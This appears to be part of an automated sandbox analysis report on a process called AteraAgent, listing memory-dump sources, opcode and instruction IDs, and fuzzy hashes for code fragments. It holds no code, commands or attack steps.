                                                                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                • Opcode ID: f3c85a0336dc09e14c7a5ccaf4b8d9c97e6f7a10055dcdd55339e680a45522c5
                                                                                                                                                                                                                                                                                                • Instruction ID: 1f5b0ef168bfa928a2d316b9157b872daeb586e50c787aa1b945d67da7a9904d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3c85a0336dc09e14c7a5ccaf4b8d9c97e6f7a10055dcdd55339e680a45522c5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAB1FF3071CB4A8FE768EB58D4A1575B3E1FF98710B144A7DD09AC36A6CA35F8438B81
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: 22056369cdef74588baf290e74f8e758c4b4a9f216800f289c757cc7ebeccf7b
                                                                                                                                                                                                                                                                                                • Instruction ID: 37d1f714675da16fff70e9291ea07b1c59e96bb0c656c09c97b8b14e0fae2f84
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22056369cdef74588baf290e74f8e758c4b4a9f216800f289c757cc7ebeccf7b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8B10631E0AA5D4FE7A4EBA488647E877F1EF55310F0502BED04DD71E2DA386A46CB41
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 0uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1082554596
                                                                                                                                                                                                                                                                                                • Opcode ID: 0dd52247b1ce6e5c7ce1fe19163649ddc882cec45ce09c674d7d26fb8b442f31
                                                                                                                                                                                                                                                                                                • Instruction ID: 7bc601346105cd20954e5ee65d363ec442777a1dc6248b063872360c45a19c7a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0dd52247b1ce6e5c7ce1fe19163649ddc882cec45ce09c674d7d26fb8b442f31
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA910911A0FFCA0FE766D7B848745647FB1EF5624070A41EFC089CB1E7ED29680A8302
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 0uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1082554596
                                                                                                                                                                                                                                                                                                • Opcode ID: d8589ad0b3fe5bc270e2b1a402d7feab141a3ab30a0923120e57596d1185dd24
                                                                                                                                                                                                                                                                                                • Instruction ID: 26a0a83987c0afeeea7d7138cdb6f7add3f1f29407e4f0c1211df60bc91bf490
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8589ad0b3fe5bc270e2b1a402d7feab141a3ab30a0923120e57596d1185dd24
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCA10F3171DB098FEB68EB6CC4A0A7173E1EF59310B1605BDD08AC76A6D935F882C780
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: 967f2c233ed64e4064e286b725be3eff3b288a58f18e0c0584b55ff6a95223bb
                                                                                                                                                                                                                                                                                                • Instruction ID: 8e220c24bd3e3d9963ad2d547fea5937aa5d0f66eacf5182186e8f4f97fc8391
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 967f2c233ed64e4064e286b725be3eff3b288a58f18e0c0584b55ff6a95223bb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EA12771E0EA4D4FE765EBE488616F8BBA0EF51310F45027ED04CDB5E2DA386A46CB41
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: @uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1269069093
                                                                                                                                                                                                                                                                                                • Opcode ID: 234db6a8adf316c01c53136b24cc9d0ceb1945faebeb82528ecc44207c3d7110
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: S:_H
                                                                                                                                                                                                                                                                                                • API String ID: 0-2485425967
                                                                                                                                                                                                                                                                                                • Opcode ID: e48bad278094801f53b9b4c0846a421c0c6bab7fcb5a30db73ba5727f6830f07
                                                                                                                                                                                                                                                                                                • Instruction ID: faeaab49be0368634dfe3eb1596cf7aa33a5f17d662ccd6e91dce204509b99d7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e48bad278094801f53b9b4c0846a421c0c6bab7fcb5a30db73ba5727f6830f07
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E41DE31B1DE4E4FEBA9DB5C8415576B3E1FBA8710B45427EE849C3266EE20FD028781
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: 487ed547e1d09287b8aeb0acf4f1ebb864e02e2ab74f094850a8eb18bc7ea584
                                                                                                                                                                                                                                                                                                • Instruction ID: 59670e6b18021cd65a1e40d32bbe5e974b48113f9d71c131293b01ed3413a31b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 487ed547e1d09287b8aeb0acf4f1ebb864e02e2ab74f094850a8eb18bc7ea584
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36411936B1DD2A8FE764FAACA4551EC73D1EF9836274501BFD149C3192CE25BC068781
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: XuR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2753689043
                                                                                                                                                                                                                                                                                                • Opcode ID: d2adfc615185c1ff36ff91972e3a3b58699143121a9a0a9804cd8adb7d8af282
                                                                                                                                                                                                                                                                                                • Instruction ID: 4f0ab900a8e68a082ce819775b38910456116ff908f32402c88de145636332b0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2adfc615185c1ff36ff91972e3a3b58699143121a9a0a9804cd8adb7d8af282
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38412432B0FE894FE7AAE66D48A59613BC1EF5528034A40FED448CB2B2DD25ED458341
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: aO_H
                                                                                                                                                                                                                                                                                                • API String ID: 0-2621181374
                                                                                                                                                                                                                                                                                                • Opcode ID: f6eef4752fb36991a9856713ecaf1af8650c2d01fa9212a6651742c19cf25238
                                                                                                                                                                                                                                                                                                • Instruction ID: cc354775d92423fba2243d88ca331a0e2dea640adb9ec4c1d52b5008608f8446
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6eef4752fb36991a9856713ecaf1af8650c2d01fa9212a6651742c19cf25238
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29510670A19A1D8FDF94EFA8C864AEDBBB1FF59300F110169E40DE7295DA34A940CB80
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: 7cb7b315f3945f748c7ce6985301021a0d5c675636ce2e7529609b8fc2e6e46f
                                                                                                                                                                                                                                                                                                • Instruction ID: 516e83e3d2605338e19e24788a98b6c1bc948b2a4b636b93783546613e74f709
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cb7b315f3945f748c7ce6985301021a0d5c675636ce2e7529609b8fc2e6e46f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E841AF71E09A4D8FDB94EFA8C8556EDB7B1FF58300F41017AE409D72A1DB386945CB41
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: `\uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2833859232
                                                                                                                                                                                                                                                                                                • Opcode ID: d8029c510d46aeb193bef66a2426d24b75ed2006022e6e7e29ae55a660c873bd
                                                                                                                                                                                                                                                                                                • Instruction ID: f134127faf0423058cb7b1deb947ddc07509a7a333d8fa66f2c7325a269f79b4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8029c510d46aeb193bef66a2426d24b75ed2006022e6e7e29ae55a660c873bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B412B71E09A4D8FDB85EFA8C451AEDBBF0FF69300F0501A6D408D72A2DB34AA45CB51
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Opcode ID: 79b196c7d1f878ce1aa958f78ff2fcd7b6b91d365dacfb65dce52f7aefd5b30d
                                                                                                                                                                                                                                                                                                • Instruction ID: 2c31b8bd1ec1a553391aac518c8842f17afdb7e3a6f6029fb1a72d53c45c7c84
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79b196c7d1f878ce1aa958f78ff2fcd7b6b91d365dacfb65dce52f7aefd5b30d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB31CA3150EBC58FC7579B3898A06903FF0EF07210B1A44DBC489CB1B3E6689C4AC762
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: `uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1275621395
                                                                                                                                                                                                                                                                                                • Opcode ID: 6c4e5ea98f0825507f0610d82afc32629a1f8c4734b499d4410308757cfb79b5
                                                                                                                                                                                                                                                                                                • Instruction ID: ce6008c3c6f18e2fb8f7314ac4fdecde412b61de6cb5674affbfb17026603d9b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c4e5ea98f0825507f0610d82afc32629a1f8c4734b499d4410308757cfb79b5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5211033170EB8D4FD7A9EB5C88A5A767BD0FB56310B0601BEE44DC71A3EA19E9418350
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: X9uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-3546979109
                                                                                                                                                                                                                                                                                                • Opcode ID: 175064b021ece1fc7b9ef666427d6bacc8f3a5a0d332a9c7dbd0796216fbfc73
                                                                                                                                                                                                                                                                                                • Instruction ID: 0a2dedea6a1ca44865716fa61e339f2ef41eb2390d5019d7044cb548dd2df4c6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 175064b021ece1fc7b9ef666427d6bacc8f3a5a0d332a9c7dbd0796216fbfc73
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2811382170E7891FE362E66998556B27BD4EF56350B0700FFE488C71A3CC085C864361
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: @uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1269069093
                                                                                                                                                                                                                                                                                                • Opcode ID: 669428d108346cca2c79e1fdbc7451681644e9586c14f2a06c84afbc24963da7
                                                                                                                                                                                                                                                                                                • Instruction ID: 62a57ed0706782516b33b9d5d43ca624527984cdeac5a9eec7503e6fe5c73acf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 669428d108346cca2c79e1fdbc7451681644e9586c14f2a06c84afbc24963da7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE019230A09B488FD7A4EB288054A667BD1EFD4315F04097EE889C7270DE34E6458781
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 8uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2899704457
                                                                                                                                                                                                                                                                                                • Opcode ID: f2eddbda3e3bad0be78a99deb3be2876a3b535c9ec4f9506814ff08b868d3b13
                                                                                                                                                                                                                                                                                                • Instruction ID: 780c0b7195436204a96d0c9faa946cf239a26cac691de864fe62c7c198e7f60a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2eddbda3e3bad0be78a99deb3be2876a3b535c9ec4f9506814ff08b868d3b13
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AF0E971D1694C4FEB95EFA484A50EC7FA0EF58200F4101AAD809C3161EE7156858701
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: aa8939b6c45edc6698381a472419fcd43afe55b5e3a7334992c0092fe8702e98
                                                                                                                                                                                                                                                                                                • Instruction ID: 75455310e3ab9273af5f2d7f0cd29636ee62a0ae30886abbb97f3aa110f67045
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa8939b6c45edc6698381a472419fcd43afe55b5e3a7334992c0092fe8702e98
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2F1E331B09A4E4FEBE5DB2C8864BA573E2FF99740F4500B6D41DC72AADF24AD428741
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: baf2c57a6af0c5a8875f24615cfd7ca03d10b7513f92d80fc618dbac802a38ac
                                                                                                                                                                                                                                                                                                • Instruction ID: ba4f45b21407fc6dd16e7fb1641905306ffbe1d14401a105622f4c4cc0f2f1f4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baf2c57a6af0c5a8875f24615cfd7ca03d10b7513f92d80fc618dbac802a38ac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8E18171A1DB4D8FE7A8EF188455666B7D2FFA8340F51457EE08DC32A2DF34A8418B42
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8c68a621fbb81583b541cf248b5cb14687e2c0eb419bc792d9bbd3829eec36a1
                                                                                                                                                                                                                                                                                                • Instruction ID: 4b6eb540a4cb9e145784a4ee007481ee4ab85750df4d49cc9166f49e8fcc269e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c68a621fbb81583b541cf248b5cb14687e2c0eb419bc792d9bbd3829eec36a1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00910531B29B4A8FE778EF6C94A55A673D1FF54310B54067DD09AC32A6EE34F8428780
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 531b08629be6b62cdb140378a51754f2368d4e64aedf307d27de12a222a5879b
                                                                                                                                                                                                                                                                                                • Instruction ID: ccafc8a33e62039b0859133bb1eacbaf69256265f43745ead1967003de1b656f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 531b08629be6b62cdb140378a51754f2368d4e64aedf307d27de12a222a5879b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5812B12B0FB9A4FF776E6AD58B51B53BD0EFA126170701BBD089CA5A3EC046D874341
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e5846a7446a2d91a12be06a316d73388ae3a003f8b46c910f50875ffe175b4fd
                                                                                                                                                                                                                                                                                                • Instruction ID: ba468e5d86a5ef5a20e4484bba98afe2ca826416a652661540ba34a4db951479
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5846a7446a2d91a12be06a316d73388ae3a003f8b46c910f50875ffe175b4fd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E810762B1DE4A0FE768E66C54661B937D1EF99364B0501BED05EC32E7FD25AC034342
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ef66a92415a860a8499b65c05e6b2dcd37550b073de2ceb1afa479f1add249f4
                                                                                                                                                                                                                                                                                                • Instruction ID: 7cddb203d98508fd73a8004706b3855babb1db466cd78b25fb42edaad926a2a6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef66a92415a860a8499b65c05e6b2dcd37550b073de2ceb1afa479f1add249f4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2391E571E0AA4E8FEBA8EFA8C8656ADB7E2FF54340F01067DE019D3196DE346D018741
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 796012b1fe89bdfd2299189f7d926f8f181bb122bf4912f18552bcc4f06ab769
                                                                                                                                                                                                                                                                                                • Instruction ID: efc962f905c24e5da81243dfee7352ac3fc851c98b476b5e1bb2ff59de82fb18
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 796012b1fe89bdfd2299189f7d926f8f181bb122bf4912f18552bcc4f06ab769
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69919570A0DA8D8FDFD6DF68C4A59A93BE1FF69310B0500AAE449D72A2DA34AC41C741
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dd48a83d8c03763d5db20a987f4e7c31ba1317019cac5d0e37c2354c583aaba5
                                                                                                                                                                                                                                                                                                • Instruction ID: fa398ea62d3ef90eb2c18996423f5c705ba3d39513010a6e8c9d6a354e2d1b51
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd48a83d8c03763d5db20a987f4e7c31ba1317019cac5d0e37c2354c583aaba5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC919271A18A8E8FEB84EF58C894BE977F1FF58300F11427AD41DC7296DA30A846CB41
                                                                                                                                                                                                                                                                                                Memory Dump Source
